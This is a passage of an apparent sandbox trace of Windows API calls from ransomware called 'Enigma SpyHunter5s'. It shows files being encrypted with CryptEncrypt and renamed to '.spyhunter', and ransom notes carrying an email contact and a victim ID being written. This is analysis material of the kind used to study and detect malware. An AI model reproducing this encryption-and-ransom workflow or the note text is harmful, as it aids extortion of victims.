(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc18*=0x30) returned 1 [0093.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.060] GetProcessHeap () returned 0x2c0000 [0093.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.060] GetProcessHeap () returned 0x2c0000 [0093.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0093.061] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc20 | out: pbBuffer=0x25cfc20) returned 1 [0093.061] GetProcessHeap () returned 0x2c0000 [0093.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc18*=0x30) returned 1 [0093.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.061] GetProcessHeap () returned 0x2c0000 [0093.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.061] GetProcessHeap () returned 0x2c0000 [0093.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0093.061] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc18 | out: pbBuffer=0x25cfc18) returned 1 [0093.061] GetProcessHeap () returned 0x2c0000 [0093.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc10*=0x30) returned 1 [0093.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.061] GetProcessHeap () returned 0x2c0000 [0093.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.061] GetProcessHeap () returned 0x2c0000 [0093.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0093.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc18 | out: pbBuffer=0x25cfc18) returned 1 [0093.062] GetProcessHeap () returned 0x2c0000 [0093.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.062] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc10*=0x30) returned 1 [0093.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.062] GetProcessHeap () returned 0x2c0000 [0093.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.062] GetProcessHeap () returned 0x2c0000 [0093.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0093.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc10 | out: pbBuffer=0x25cfc10) returned 1 [0093.062] GetProcessHeap () returned 0x2c0000 [0093.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.062] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc08*=0x30) returned 1 [0093.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.062] GetProcessHeap () returned 0x2c0000 [0093.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.062] GetProcessHeap () returned 0x2c0000 [0093.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0093.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc10 | out: pbBuffer=0x25cfc10) returned 1 [0093.063] GetProcessHeap () returned 0x2c0000 [0093.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc08*=0x30) returned 1 [0093.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.063] GetProcessHeap () returned 0x2c0000 [0093.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.063] GetProcessHeap () returned 0x2c0000 [0093.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0093.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc08 | out: pbBuffer=0x25cfc08) returned 1 [0093.063] GetProcessHeap () returned 0x2c0000 [0093.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc00*=0x30) returned 1 [0093.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.063] GetProcessHeap () returned 0x2c0000 [0093.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.063] GetProcessHeap () returned 0x2c0000 [0093.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346aa8 | out: hHeap=0x2c0000) returned 1 [0093.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc08 | out: pbBuffer=0x25cfc08) returned 1 [0093.064] GetProcessHeap () returned 0x2c0000 [0093.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc00*=0x30) returned 1 [0093.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0093.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0093.064] StrStrW (lpFirst="FM20.CHM", lpSrch=".txt") returned 0x0 [0093.064] GetProcessHeap () returned 0x2c0000 [0093.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0093.064] ReadFile (in: hFile=0x16c, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x25cfbc4*=0x2800, lpOverlapped=0x0) returned 1 [0093.086] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.086] WriteFile (in: hFile=0x16c, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x25cfbc4*=0x2800, lpOverlapped=0x0) returned 1 [0093.086] GetProcessHeap () returned 0x2c0000 [0093.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.086] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.086] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfc04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x25cfc04*, lpNumberOfBytesWritten=0x25cfbc4*=0x4, lpOverlapped=0x0) returned 1 [0093.195] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfbc4*=0x30, lpOverlapped=0x0) returned 1 [0093.195] CloseHandle (hObject=0x16c) returned 1 [0094.252] GetProcessHeap () returned 0x2c0000 [0094.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0094.253] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.spyhunter") returned 83 [0094.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.spyhunter")) returned 1 [0094.254] GetProcessHeap () returned 0x2c0000 [0094.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0094.254] GetProcessHeap () returned 0x2c0000 [0094.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0094.254] GetProcessHeap () returned 0x2c0000 [0094.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3468e8 | out: hHeap=0x2c0000) returned 1 [0094.254] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc00 | out: pbBuffer=0x25cfc00) returned 1 [0094.254] GetProcessHeap () returned 0x2c0000 [0094.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0094.254] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbf8*=0x30) returned 1 [0094.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0094.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0094.254] StrStrW (lpFirst="MSB1ESEN.DLL", lpSrch=".txt") returned 0x0 [0094.255] GetProcessHeap () returned 0x2c0000 [0094.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0094.255] ReadFile (in: hFile=0x16c, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x25cfbbc*=0x2800, lpOverlapped=0x0) returned 1 [0094.328] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.328] WriteFile (in: hFile=0x16c, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x25cfbbc*=0x2800, lpOverlapped=0x0) returned 1 [0094.328] GetProcessHeap () returned 0x2c0000 [0094.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0094.328] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.328] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfbbc, lpOverlapped=0x0 | out: lpBuffer=0x25cfbfc*, lpNumberOfBytesWritten=0x25cfbbc*=0x4, lpOverlapped=0x0) returned 1 [0094.329] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfbbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfbbc*=0x30, lpOverlapped=0x0) returned 1 [0094.329] CloseHandle (hObject=0x16c) returned 1 [0094.672] GetProcessHeap () returned 0x2c0000 [0094.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0094.672] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.spyhunter") returned 87 [0094.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll.spyhunter")) returned 1 [0094.674] GetProcessHeap () returned 0x2c0000 [0094.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0094.675] GetProcessHeap () returned 0x2c0000 [0094.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0094.675] GetProcessHeap () returned 0x2c0000 [0094.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3778b0 | out: hHeap=0x2c0000) returned 1 [0094.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0094.675] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0094.675] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfc5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb33*, lpNumberOfBytesWritten=0x25cfc5c*=0x127, lpOverlapped=0x0) returned 1 [0094.676] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0094.676] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfc5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfc5c*=0x2ac, lpOverlapped=0x0) returned 1 [0094.676] CloseHandle (hObject=0x16c) returned 1 [0094.677] GetProcessHeap () returned 0x2c0000 [0094.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x342ef0 | out: hHeap=0x2c0000) returned 1 [0094.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbf8 | out: pbBuffer=0x25cfbf8) returned 1 [0094.677] GetProcessHeap () returned 0x2c0000 [0094.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0094.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbf0*=0x30) returned 1 [0094.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0094.677] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0094.677] StrStrW (lpFirst="MSB1ENFR.ITS", lpSrch=".txt") returned 0x0 [0094.677] GetProcessHeap () returned 0x2c0000 [0094.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0094.677] ReadFile (in: hFile=0x16c, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x25cfbb4*=0x2800, lpOverlapped=0x0) returned 1 [0094.726] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.726] WriteFile (in: hFile=0x16c, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x25cfbb4*=0x2800, lpOverlapped=0x0) returned 1 [0094.727] GetProcessHeap () returned 0x2c0000 [0094.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0094.727] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.727] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x25cfbf4*, lpNumberOfBytesWritten=0x25cfbb4*=0x4, lpOverlapped=0x0) returned 1 [0094.777] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfbb4*=0x30, lpOverlapped=0x0) returned 1 [0094.777] CloseHandle (hObject=0x16c) returned 1 [0095.243] GetProcessHeap () returned 0x2c0000 [0095.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0095.243] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.spyhunter") returned 87 [0095.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its.spyhunter")) returned 1 [0095.244] GetProcessHeap () returned 0x2c0000 [0095.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0095.244] GetProcessHeap () returned 0x2c0000 [0095.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0095.244] GetProcessHeap () returned 0x2c0000 [0095.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3777c8 | out: hHeap=0x2c0000) returned 1 [0095.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0095.244] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0095.244] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfc54, lpOverlapped=0x0 | out: lpBuffer=0x25cfb2b*, lpNumberOfBytesWritten=0x25cfc54*=0x127, lpOverlapped=0x0) returned 1 [0095.245] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0095.245] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfc54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfc54*=0x2ac, lpOverlapped=0x0) returned 1 [0095.246] CloseHandle (hObject=0x16c) returned 1 [0095.246] GetProcessHeap () returned 0x2c0000 [0095.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x342e00 | out: hHeap=0x2c0000) returned 1 [0095.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbf0 | out: pbBuffer=0x25cfbf0) returned 